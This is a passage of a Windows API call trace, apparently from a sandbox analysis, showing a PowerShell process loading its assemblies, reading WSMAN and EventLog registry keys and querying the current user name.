lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0135.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0135.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0135.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0135.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0135.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0135.830] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0135.830] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.830] CoTaskMemFree (pv=0x10ccc0) [0135.831] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0135.831] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.831] CoTaskMemFree (pv=0x10ccc0) [0135.833] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0135.833] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.833] CoTaskMemFree (pv=0x10ccc0) [0135.834] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0135.834] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.834] CoTaskMemFree (pv=0x10ccc0) [0135.850] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0135.850] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.850] CoTaskMemFree (pv=0x10ccc0) [0135.853] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0135.853] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.853] CoTaskMemFree (pv=0x10ccc0) [0135.854] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0135.854] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.854] CoTaskMemFree (pv=0x10ccc0) [0135.864] RegQueryInfoKeyW (in: hKey=0x304, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd1dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd1d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd1dc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd1d8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0135.864] CoTaskMemFree (pv=0x0) [0135.864] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.864] RegEnumValueW (in: hKey=0x304, dwIndex=0x0, lpValueName=0x14d180, lpcchValueName=0xcd288, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xcd288, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0135.864] CoTaskMemFree (pv=0x14d180) [0135.864] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.864] RegEnumValueW (in: hKey=0x304, dwIndex=0x1, lpValueName=0x14d180, lpcchValueName=0xcd288, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xcd288, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0135.864] CoTaskMemFree (pv=0x14d180) [0135.864] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.864] RegEnumValueW (in: hKey=0x304, dwIndex=0x2, lpValueName=0x14d180, lpcchValueName=0xcd288, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xcd288, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0135.864] CoTaskMemFree (pv=0x14d180) [0135.865] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd26c, lpData=0x0, lpcbData=0xcd268*=0x0 | out: lpType=0xcd26c*=0x1, lpData=0x0, lpcbData=0xcd268*=0x8) returned 0x0 [0135.865] CoTaskMemAlloc (cb=0xc) returned 0x1ce940 [0135.865] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd23c, lpData=0x1ce940, lpcbData=0xcd238*=0x8 | out: lpType=0xcd23c*=0x1, lpData="2.0", lpcbData=0xcd238*=0x8) returned 0x0 [0135.865] CoTaskMemFree (pv=0x1ce940) [0135.919] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd228 | out: phkResult=0xcd228*=0x308) returned 0x0 [0135.919] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd12c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd128, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd12c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd128*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0135.919] CoTaskMemFree (pv=0x0) [0135.919] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.919] RegEnumValueW (in: hKey=0x308, dwIndex=0x0, lpValueName=0x14d180, lpcchValueName=0xcd1d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xcd1d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0135.919] CoTaskMemFree (pv=0x14d180) [0135.919] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.919] RegEnumValueW (in: hKey=0x308, dwIndex=0x1, lpValueName=0x14d180, lpcchValueName=0xcd1d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xcd1d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0135.919] CoTaskMemFree (pv=0x14d180) [0135.919] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.919] RegEnumValueW (in: hKey=0x308, dwIndex=0x2, lpValueName=0x14d180, lpcchValueName=0xcd1d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xcd1d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0135.919] CoTaskMemFree (pv=0x14d180) [0135.919] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd1bc, lpData=0x0, lpcbData=0xcd1b8*=0x0 | out: lpType=0xcd1bc*=0x1, lpData=0x0, lpcbData=0xcd1b8*=0x8) returned 0x0 [0135.919] CoTaskMemAlloc (cb=0xc) returned 0x1ce7a0 [0135.919] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd18c, lpData=0x1ce7a0, lpcbData=0xcd188*=0x8 | out: lpType=0xcd18c*=0x1, lpData="2.0", lpcbData=0xcd188*=0x8) returned 0x0 [0135.919] CoTaskMemFree (pv=0x1ce7a0) [0135.920] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0135.920] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.920] CoTaskMemFree (pv=0x10ccc0) [0135.926] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0135.926] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.926] CoTaskMemFree (pv=0x10ccc0) [0135.945] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd258 | out: phkResult=0xcd258*=0x30c) returned 0x0 [0135.948] RegQueryInfoKeyW (in: hKey=0x30c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd1cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd1c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd1cc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd1c8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0135.948] CoTaskMemFree (pv=0x0) [0135.949] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.949] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x0, lpName=0x14d180, lpcchName=0xcd258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0135.949] CoTaskMemFree (pv=0x14d180) [0135.949] CoTaskMemFree (pv=0x0) [0135.949] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.949] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x1, lpName=0x14d180, lpcchName=0xcd258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0135.949] CoTaskMemFree (pv=0x14d180) [0135.949] CoTaskMemFree (pv=0x0) [0135.949] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.949] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x2, lpName=0x14d180, lpcchName=0xcd258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0135.950] CoTaskMemFree (pv=0x14d180) [0135.950] CoTaskMemFree (pv=0x0) [0135.950] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.950] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x3, lpName=0x14d180, lpcchName=0xcd258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0135.950] CoTaskMemFree (pv=0x14d180) [0135.950] CoTaskMemFree (pv=0x0) [0135.950] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.950] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x4, lpName=0x14d180, lpcchName=0xcd258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0135.950] CoTaskMemFree (pv=0x14d180) [0135.950] CoTaskMemFree (pv=0x0) [0135.950] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.950] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x5, lpName=0x14d180, lpcchName=0xcd258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0135.950] CoTaskMemFree (pv=0x14d180) [0135.950] CoTaskMemFree (pv=0x0) [0135.951] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.951] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x6, lpName=0x14d180, lpcchName=0xcd258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0135.951] CoTaskMemFree (pv=0x14d180) [0135.951] CoTaskMemFree (pv=0x0) [0135.951] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.951] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x7, lpName=0x14d180, lpcchName=0xcd258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0135.951] CoTaskMemFree (pv=0x14d180) [0135.951] CoTaskMemFree (pv=0x0) [0135.951] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.951] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x8, lpName=0x14d180, lpcchName=0xcd258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0135.951] CoTaskMemFree (pv=0x14d180) [0135.951] CoTaskMemFree (pv=0x0) [0135.951] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x320) returned 0x0 [0135.951] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x0) returned 0x2 [0135.952] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x330) returned 0x0 [0135.952] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x0) returned 0x2 [0135.952] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x334) returned 0x0 [0135.952] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x0) returned 0x2 [0135.952] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x338) returned 0x0 [0135.952] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x0) returned 0x2 [0135.952] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x33c) returned 0x0 [0135.952] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x0) returned 0x2 [0135.952] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x340) returned 0x0 [0135.953] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x0) returned 0x2 [0135.953] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x0) returned 0x5 [0136.078] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x344) returned 0x0 [0136.078] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x0) returned 0x2 [0136.078] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x348) returned 0x0 [0136.078] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x34c) returned 0x0 [0136.079] RegCloseKey (hKey=0x34c) returned 0x0 [0136.079] RegCloseKey (hKey=0x30c) returned 0x0 [0136.080] RegCloseKey (hKey=0x348) returned 0x0 [0136.095] CoTaskMemAlloc (cb=0x804) returned 0x1b814640 [0136.096] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b814640, nSize=0xcd4c8 | out: lpNameBuffer="AUFDDCNTXWT\\aDU0VK IWA5kLS", nSize=0xcd4c8) returned 0x1 [0136.097] CoTaskMemFree (pv=0x1b814640) [0136.098] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.098] GetUserNameW (in: lpBuffer=0x14d180, pcbBuffer=0xcd508 | out: lpBuffer="aDU0VK IWA5kLS", pcbBuffer=0xcd508) returned 1 [0136.098] CoTaskMemFree (pv=0x14d180) [0136.169] CoTaskMemFree (pv=0x0) [0136.169] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.169] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x0, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.169] CoTaskMemFree (pv=0x14d180) [0136.169] CoTaskMemFree (pv=0x0) [0136.169] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.169] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x1, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.169] CoTaskMemFree (pv=0x14d180) [0136.169] CoTaskMemFree (pv=0x0) [0136.169] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.169] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x2, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.169] CoTaskMemFree (pv=0x14d180) [0136.169] CoTaskMemFree (pv=0x0) [0136.169] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.169] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x3, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.169] CoTaskMemFree (pv=0x14d180) [0136.169] CoTaskMemFree (pv=0x0) [0136.169] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.169] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x4, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.169] CoTaskMemFree (pv=0x14d180) [0136.169] CoTaskMemFree (pv=0x0) [0136.170] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.170] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x5, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.170] CoTaskMemFree (pv=0x14d180) [0136.170] CoTaskMemFree (pv=0x0) [0136.170] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.170] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x6, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.170] CoTaskMemFree (pv=0x14d180) [0136.170] CoTaskMemFree (pv=0x0) [0136.170] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.170] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x7, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.170] CoTaskMemFree (pv=0x14d180) [0136.170] CoTaskMemFree (pv=0x0) [0136.170] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.170] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x8, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.170] CoTaskMemFree (pv=0x14d180) [0136.170] CoTaskMemFree (pv=0x0) [0136.181] RegOpenKeyExW (in: hKey=0x350, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x36c) returned 0x0 [0136.181] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x0) returned 0x2 [0136.181] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x370) returned 0x0 [0136.182] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x374) returned 0x0 [0136.182] RegCloseKey (hKey=0x374) returned 0x0 [0136.182] RegCloseKey (hKey=0x350) returned 0x0 [0136.182] RegCloseKey (hKey=0x370) returned 0x0 [0136.183] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x370) returned 0x0 [0136.183] RegQueryInfoKeyW (in: hKey=0x370, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd17c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd178, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd17c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd178*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.183] CoTaskMemFree (pv=0x0) [0136.183] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.183] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x0, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.183] CoTaskMemFree (pv=0x14d180) [0136.183] CoTaskMemFree (pv=0x0) [0136.183] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.183] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x1, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.183] CoTaskMemFree (pv=0x14d180) [0136.183] CoTaskMemFree (pv=0x0) [0136.183] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.183] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x2, lpName=0x14d180, 